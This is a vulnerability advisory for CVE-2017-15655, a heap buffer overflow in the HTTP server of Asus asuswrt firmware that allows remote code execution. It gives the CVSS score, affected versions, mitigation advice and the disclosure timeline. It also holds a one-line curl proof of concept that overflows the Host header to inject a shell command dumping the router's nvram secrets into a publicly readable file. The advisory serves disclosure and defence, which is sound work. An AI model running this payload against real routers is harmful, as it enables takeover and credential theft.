Heap buffer overflow in multiple HTTP headers allows for an unauthenticated remote code execution.

ALERT! Users having routers not upgradable from 3.0.0.4.376.* or less should CLOSE the http from WAN and should restrict the access to management port from LAN as well!

CVE: CVE-2017-15655

CVSS v3: 9.6
AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
(Administrator needs to login and visit certain page at the router website)

Description:

This vulnerability affects new Asus routers with not up-to-date firmware, as well as some older end-of-life routers (e.g. RT-N65R, RT-N65U)

Multiple buffer overflow vulnerabilities in HTTPd server in Asus asuswrt version <=3.0.0.4.376.X. All have been fixed in version 3.0.0.4.378, but this vulnerability was not previously disclosed. Some end-of-life routers have this version as the newest so are vulnerable at this time. This vulnerability allows for RCE with administrator rights when the administrator visits serveral pages.

For example the “Host:” header is vulnerable and allows to override the SystemCmd variable which then allows for RCE when the administrator visits serveral pages (for example the network tools router tab).

PoC (after running this script, when the administrator visists one of several pages which trigger commands e.g. the network tools tab, the script is being run and outputs the contents of nvram to a css file which can be retrived without authentication)

$ curl 'http://routerIP:8080' -H "Host: xxxxxxxxxxxxxx $(for i in $(seq 1 9700); do echo -n " "; done)  \$(nvram show > /www/user/nvram.css )"

Timeline:

• 17.09.2017 - vendor notified
• 18.09.2017 - vendor REFUSED to fix the vulnerability as the routers using the vulnerable firmware are already EOL

Video: